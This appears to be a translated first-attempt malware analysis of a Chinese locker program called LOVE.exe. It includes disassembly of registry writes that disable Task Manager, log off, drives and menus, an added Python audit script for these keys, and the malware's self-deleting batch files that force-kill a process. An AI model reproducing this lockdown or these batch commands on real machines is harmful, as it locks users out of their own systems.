00401C49 |. 6A 00 push 0x0
00401C4B |. 68 03000000 push 0x3
00401C50 |. 68 03000000 push 0x3
00401C55 |. BB 103B4000 mov ebx,LOVE.00403B10
00401C5A |. E8 F4160000 call LOVE.00403353 ; disables IE downloads
00401C62 |. 68 01030080 push 0x80000301
00401C67 |. 6A 00 push 0x0
00401C69 |. 68 01000000 push 0x1
00401C6E |. 68 04000080 push 0x80000004
00401C73 |. 6A 00 push 0x0
00401C75 |. 68 8FA14600 push LOVE.0046A18F ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu
00401C7A |. 68 01030080 push 0x80000301
00401C7F |. 6A 00 push 0x0
00401C81 |. 68 03000000 push 0x3
00401C86 |. 68 03000000 push 0x3
00401C8B |. BB 103B4000 mov ebx,LOVE.00403B10
00401C90 |. E8 BE160000 call LOVE.00403353 ; disables the right-click context menu
00401C98 |. 68 01030080 push 0x80000301
00401C9D |. 6A 00 push 0x0
00401C9F |. 68 01000000 push 0x1
00401CA4 |. 68 04000080 push 0x80000004
00401CA9 |. 6A 00 push 0x0
00401CAB |. 68 DFA14600 push LOVE.0046A1DF ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
00401CB0 |. 68 01030080 push 0x80000301
00401CB5 |. 6A 00 push 0x0
00401CB7 |. 68 03000000 push 0x3
00401CBC |. 68 03000000 push 0x3
00401CC1 |. BB 103B4000 mov ebx,LOVE.00403B10
00401CC6 |. E8 88160000 call LOVE.00403353 ; prevents restarting into the DOS environment
00401CCE |. 68 01030080 push 0x80000301
00401CD3 |. 6A 00 push 0x0
00401CD5 |. 68 01000000 push 0x1
00401CDA |. 68 04000080 push 0x80000004
00401CDF |. 6A 00 push 0x0
00401CE1 |. 68 26A24600 push LOVE.0046A226 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
00401CE6 |. 68 01030080 push 0x80000301
00401CEB |. 6A 00 push 0x0
00401CED |. 68 03000000 push 0x3
00401CF2 |. 68 03000000 push 0x3
00401CF7 |. BB 103B4000 mov ebx,LOVE.00403B10
00401CFC |. E8 52160000 call LOVE.00403353 ; prevents logging off
00401D04 |. 68 01030080 push 0x80000301
00401D09 |. 6A 00 push 0x0
00401D0B |. 68 01000000 push 0x1
00401D10 |. 68 04000080 push 0x80000004
00401D15 |. 6A 00 push 0x0
00401D17 |. 68 6BA24600 push LOVE.0046A26B ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
00401D1C |. 68 01030080 push 0x80000301
00401D21 |. 6A 00 push 0x0
00401D23 |. 68 03000000 push 0x3
00401D28 |. 68 03000000 push 0x3
00401D2D |. BB 103B4000 mov ebx,LOVE.00403B10
00401D32 |. E8 1C160000 call LOVE.00403353 ; disables the Documents menu
There are many more operations, but they are all of the same kind, so they are not listed one by one; they are essentially simple registry operations. Once execution reaches the following, it is basically over:
004032C9 /. 55 push ebp
004032CA |. 8BEC mov ebp,esp
004032CC |. 68 04000080 push 0x80000004
004032D1 |. 6A 00 push 0x0
004032D3 |. 68 9FC44600 push LOVE.0046C49F ; LOVE
004032D8 |. 68 01030080 push 0x80000301
004032DD |. 6A 00 push 0x0
004032DF |. 68 00000000 push 0x0
004032E4 |. 68 04000080 push 0x80000004
004032E9 |. 6A 00 push 0x0
004032EB |. 68 A4C44600 push LOVE.0046C4A4 ; 李研我爱你! ("Li Yan, I love you!")
004032F0 |. 68 03000000 push 0x3
004032F5 |. BB E03B4000 mov ebx,LOVE.00403BE0
004032FA |. E8 54000000 call LOVE.00403353 ; at this point it is basically done; this pops up the message box "Li Yan, I love you!"
004032FF |. 83C4 28 add esp,0x28
00403302 |. 8BE5 mov esp,ebp
00403304 |. 5D pop ebp
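The registry lockdown traced above is what a responder has to find and undo. As an added example that is not part of the original report, the following Python parses a constructed .reg export carrying the same value names and paths, reports which of the documented policies are set, expands the NoDrives bitmask into drive letters, and flags the exefile icon and .txt handler changes; putting the policy keys under HKCU in the sample is an assumption, and reading the two dwords pushed for NoDrives (0xFFE00000, 0x41EFFFFF) as an IEEE-754 double is my interpretation of the listing, not a statement from the report.

```python
"""Audit a .reg export for the registry lockdown documented in the LOVE.exe report.
Added example, not the author's code. SAMPLE_REG is constructed from the paths in
the listing; placing the policy keys under HKCU is an assumption."""
import struct

# Policy values the listing sets to 1 (a subset), with the effect the report gives each.
POLICY_EFFECTS = {
    "DisableTaskMgr": "Task Manager disabled",
    "Disableregistrytools": "Registry Editor disabled",
    "NoControlPanel": "Control Panel disabled",
    "NoRun": "Start menu Run hidden",
    "NoClose": "Start menu Shut Down hidden",
    "NoFind": "Start menu Search hidden",
    "NoLogOff": "Log Off hidden",
    "NoFolderOptions": "Folder Options hidden",
    "NoRealMode": "restart to MS-DOS mode blocked",
    "NoViewOnDrive": "drives cannot be browsed",
    "NoDrives": "drive letters hidden",
}

SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"LOVE.exe"="C:\\Documents and Settings\\Administrator\\桌面\\LOVE.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"Disableregistrytools"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000001
"NoClose"=dword:00000001
"NoDrives"=dword:ffffffff
[HKEY_CURRENT_USER\Software\Classes\exefile\DefaultIcon]
@="C:\\windows\\system32\\Aver.ico"
[HKEY_CURRENT_USER\Software\Classes\.txt]
@="jpegfile"
"""

def parse_reg(text):
    """Return {(key, value_name): value} from a .reg export; value_name '' is the
    default (@) value. Handles dword: and string data and skips other types."""
    entries, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line[:1] in ('"', "@") and "=" in line:
            name, _, data = line.partition("=")
            name = "" if name == "@" else name.strip('"')
            if data.startswith("dword:"):
                entries[(key, name)] = int(data[6:], 16)
            elif len(data) >= 2 and data[0] == data[-1] == '"':
                # .reg escapes backslashes and double quotes inside string data
                entries[(key, name)] = data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    return entries

def drive_letters(mask):
    """Expand a NoDrives bitmask (bit 0 = A:, bit 25 = Z:) into drive letters."""
    return "".join(chr(ord("A") + i) for i in range(26) if mask >> i & 1)

def nodrives_from_pushes(lo_dword, hi_dword):
    """The listing pushes NoDrives as two dwords behind a 0x80000601 type tag. Read as
    a little-endian IEEE-754 double, 0xFFE00000/0x41EFFFFF is 4294967295.0, i.e. the
    DWORD 0xFFFFFFFF with every drive bit set (my reading of the bytes, not the report's)."""
    (value,) = struct.unpack("<d", struct.pack("<II", lo_dword, hi_dword))
    return int(value)

def audit(entries):
    """Return one finding per entry matching a behaviour described in the report."""
    findings = []
    for (key, name), value in entries.items():
        k = key.lower()
        if name in POLICY_EFFECTS and isinstance(value, int) and value:
            detail = f" ({drive_letters(value)})" if name == "NoDrives" else ""
            findings.append(f"policy {name}={value:#x}: {POLICY_EFFECTS[name]}{detail}")
        elif k.endswith(r"\currentversion\run") and isinstance(value, str):
            findings.append(f"autorun {name} -> {value}")
        elif k.endswith(r"\exefile\defaulticon") and name == "" and "%1" not in str(value):
            findings.append(f"exefile default icon replaced: {value}")
        elif k.endswith((r"\classes\.txt", r"\classes\.inf")) and name == "" and value == "jpegfile":
            findings.append(f"{k[-4:]} files open with jpegfile (image viewer)")
    return findings

if __name__ == "__main__":
    for finding in audit(parse_reg(SAMPLE_REG)):
        print(finding)
    print(f"NoDrives from the listing: {nodrives_from_pushes(0xFFE00000, 0x41EFFFFF):#x}")
```

On a live system the same audit runs against the output of `reg export` for HKCU and HKLM, since the listing does not show which hive each policy key lands in.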
Supplement:
Contents of the generated del.bat and ddel.bat files:
del.bat:
del Aver.exe del.bat ----> deletes Aver.exe and del.bat
del %
ddel.bat:
@echo off
taskkill /f /im expleror.exe ----> forcibly terminates the expleror.exe process, that is, the desktop process.
start expleror.exe ----> restarts it. This is done so that the change of all application icons becomes visible.
del ddel.bat ----> deletes itself.
exit
This is my first analysis; there are many places and many details that I have not analysed properly, so I ask the experts for plenty of guidance...
